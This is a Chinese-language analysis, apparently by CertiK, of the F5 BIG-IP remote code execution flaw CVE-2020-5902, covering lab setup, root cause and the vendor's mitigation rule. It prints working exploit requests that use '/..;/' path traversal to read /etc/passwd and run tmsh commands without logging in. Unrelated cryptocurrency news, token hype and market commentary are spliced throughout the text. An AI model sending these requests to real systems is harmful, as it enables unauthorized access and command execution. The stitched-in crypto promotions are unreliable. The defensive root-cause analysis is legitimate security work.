前言
今日一早起來推特以及各大技術論壇上炸開了鍋,安全圈子的人都在討論F5設備里遠程代碼執行的漏洞。很多討論的內容,大部分是在分享如何尋找目標,利用漏洞,并沒有關于對漏洞成因的分析。CertiK的安全研究員下載了存在漏洞的程序,搭建環境復現漏洞后,對漏洞的起因進行了分析,并在下文分享給大家。
背景
F5BIG-IP是美國F5公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。PositiveTechnologies的研究人員MikhailKlyuchnikov發現其配置工具TrafficManagementUserInterface中存在遠程代碼執行漏洞,CVE編號為CVE-2020-5902。該漏洞CVSSv3評分為10分,攻擊者可利用該漏洞創建或刪除文件,關閉服務、執行任意的系統命令,最終獲得服務器的完全控制權。CVE具體表述請查看文章底部參考鏈接1。
受影響的BIG-IP軟件版本
漏洞利用
讀取任意文件:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Buy Me a Coffee聯合創始人:ZKN的生態應用Cering Swap很有前景:9月6日,Buy Me a Coffee聯合創始人發布推特稱,ZKN我在關注,應該很快就會上漲,他們的生態應用Cering Swap很有前景,是世界上第一個跨鏈聚合的去中心化交易所,Cering Swap代幣CNG我也會參與,我甚至準備好了梭哈。[2021/9/6 23:04:43]
遠程執行tmsh命令:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方給出的臨時修復方案(后文會對修復進行分析):
漏洞復現
在F5的官網注冊賬號之后,可以從F5的資源庫中下載存在漏洞的BIG-IP軟件。訪問參考鏈接2可以下載BIG-IPTMOS(TrafficManagementOperatingSystem,流量管理操作系統)的虛擬機鏡像。CertiK技術團隊因為使用VmwareFusion,下載的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer”。
Blin Metaverse將于9月6日開放首輪Certified Sale:據官方消息,Blin Metaverse分別與Bounce Finance、DAOStarter、ERAX達成戰略合作。并將在UTC時間9月6日12:00(北京時間20:00)于這三家平臺進行首輪Certified Sale。
據悉,Blin Metaverse是基于幣安智能鏈BSC的元宇宙+NFTFi 基礎設施。旨在通過 IP 重塑、虛擬社交、鏈上 NFT 資產鑄造、確權、價值流通等方式實現多元化虛擬現實交互的綜合性去中心化NFT基礎設施。[2021/9/6 23:03:32]
在VmwareFusion中加載鏡像(import):
加載完成之后,使用默認用戶名密碼登陸系統:
用戶名:root
密碼:default
系統初始化之后,使用”ifconfig”命令查詢虛擬機IP地址。CertiK技術團隊的BIG-IPTMUI虛擬機IP地址為”172.16.4.137”。
在瀏覽器中訪問BIG-IPTMUI登陸界面:
Tracer DAO完成450萬美元融資,Framework Ventures參投:6月29日,Tracer DAO宣布完成450萬美元融資,本輪融資由Framework Ventures、DACM、Maven11、Apollo Capital、Distributed Global Ventures、Paperclip Fund、Supernova、GSR,以及Efficient Frontier參投。本輪融資資金將用于引入新的開發人員加入團隊。Tracer DAO是一個去中心化交易平臺,為用戶提供高杠桿永續交易服務。[2021/6/29 0:15:11]
https://172.16.4.137/tmui/login.jsp
復現任意文件讀取:
在瀏覽器中訪問以下地址可以讀取”/etc/passwd”文件內容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
基于以太坊的DeFi協議Balancer在Algorand上擴展:基于以太坊的DeFi協議Balancer計劃在Algorand上擴展。Algorand首席運營官W. Sean Ford表示,一旦在Algorand區塊鏈上啟動,Balancer用戶將能夠與任何Algorand標準資產(ASA)建立流動性池或交易對。(The Block)[2021/4/6 19:52:01]
復現tmsh命令執行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
漏洞分析
在進入漏洞分析前,先要明確一點:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用戶登陸后本身是可以被訪問的。
下面的截圖顯示了登陸前和登陸后訪問以下URL的區別:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
MDEX去中心化交易協議完成Certik全方位安全審計:據MDEX官方消息稱,目前已通過區塊鏈審計公司Certik進行的全方位安全審計,各項審計指標均優異,無任何環節需要代碼更新,審計報告將添加到官方GitHub存儲庫。詳情見原文鏈接。[2021/3/25 19:18:30]
登陸前訪問:
被跳轉回登陸界面
輸入賬號密碼登陸管理界面之后再訪問,可執行fileRead.jsp讀取文件。
fileRead.jsp和tmshCmd.jsp雖然是在PoC中最終被利用的文件,但是他們并不是漏洞的起因。此漏洞的本質是利用Apache和后臺Java(tomcat)對URL的解析方式不同來繞過登陸限制,在未授權的情況下,訪問后臺JSP模塊。CertiK技術人員第一次注意到此類型漏洞是在2018年Orange的BlackHat演講:“BreakingParserLogicTakeYourPathNormalizationOffandPop0DaysOut”.這里可以查看演講稿件(參考鏈接2)。
這里我們可以理解在F5BIG-IP的后臺服務器對收到了URL請求進行了兩次的解析,第一次是httpd(Apache),第二次是后一層的Java(tomcat).
在URL在第一次被Apache解析時,Apache關注的是URL的前半段https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
當Apache在看見前半段是合法URL且是允許被訪問的頁面時,就把它交給了后面的第二層。Apache在這里完全把URL里面關鍵的/..;/給無視了。
在URL在第二次被解析時,后面的Java(tomcat)會把/..;/理解為,向上返回一層路徑。此時,/login.jsp/和/..;/會抵消掉。Tomcat看到的真正請求從
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
變成了:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
再來fileRead.jsp并沒有對收到的請求進行身份驗證,后臺因此直接執行fileRead.jsp,讀取并返回了/etc/passwd文件的內容。
根據以上的思路,其實可以找出別的利用漏洞的URL,比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
這里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一樣,是一個不需要登陸就能訪問的頁面。但是因為要向上返回兩次,需要用兩個/..;/來抵消掉”/login/legal.html”。
回到開頭提到的官方給出的臨時修復方案,修復方案的本質是在httpd的配置中添加以下規則:
include'
<LocationMatch".*\\.\\.;.*">
Redirect404/
</LocationMatch>
'
這個規則的意思是,當http服務器在監測到URL中包含..;(句號句號分號)的時候,直接返回404.這樣利用漏洞的請求就沒辦法到達后臺(第二層)了。
如何避免漏洞:
此漏洞的利用方式在網絡上公開之后,因為它的攻擊成本低廉,大批黑客都開始圖謀利用此漏洞攻擊使用F5BIG-IP產品的系統。黑客只需要付出極小的代價就能獲得目標系統的控制權,對系統產生巨大的破壞。
俗話說:“不怕賊偷,就怕賊惦記”。即便這樣的黑客攻擊事件這次沒有發生在你身上,不代表你是安全的。因為很有可能黑客的下一個目標就是你。
而Certik的專業技術團隊會幫你徹底打消這種“賊惦記”的擔憂。CertiK專業滲透測試團隊會通過對此類事件的監測,第一時間給客戶提交漏洞預警報告,幫助客戶了解漏洞細節以及防護措施。此舉可以確保客戶的系統不受攻擊并且不會遭受財產損失。
同時作為一名安全技術人員,在新漏洞被發現的時,不僅需要知道漏洞是如何被黑客利用的,更要去探尋漏洞背后的原因,方可積累經驗,更加有能力在復雜的系統中發現隱藏的漏洞。
CertiK以及其技術人員,將永遠把安全當做信仰,與大家一同學習并一同成長。
參考鏈接
1.https://cve.mitre.org/
2.https://downloads.f5.com/
3.https://i.blackhat.com/
近日,據官方消息,Filecoin將于本周五進行網絡重置,并在下周開啟大礦工測試。消息一出,Filecoin鴿王的名聲算是實錘了,這已經是Filecoin第三次推遲了,意味著其主網上線的時間又將.
1900/1/1 0:00:00這幾天,我看媒體的頭條又變成了黃金暴跌、美元閃崩、A股暴跌這樣的字眼,無一例外不是因為中美摩擦加劇產生的結果。唯一奇特的是美股居然還在上漲。而就在昨晚,美國股指再次出現喜聞樂見的上漲.
1900/1/1 0:00:00行情回顧及行情走勢 1.BTC行情回顧 比特幣價格昨日走出小幅的上行,價格昨日白盤維持在9150附近震蕩運行直至晚間價格開始走出上行,日內凌晨價格觸及9290位置后走出回落.
1900/1/1 0:00:00據U.Today消息,由迪拜政府建立的KYC區塊鏈聯盟平臺日前已經正式啟動。KYC區塊鏈聯盟是迪拜經濟發展部與阿聯酋航空NBD聯合發起的對區塊鏈的監管的一個平臺.
1900/1/1 0:00:00交易是一場賭局,做一個精明且有計劃的賭徒。付出風險、得到回報、接受虧損、贏的概率,爭取活下來,直到運氣到來.
1900/1/1 0:00:00:昨天持幣者的文章的標題是《8月7日比特幣行情分析猶記得前幾天暴跌在眼前》,持幣者在里面也是講解了一下多空的風險。昨天比特幣雖然未形成瀑布行情,但是也收取了一根上下波動達到150點左右的陰線.
1900/1/1 0:00:00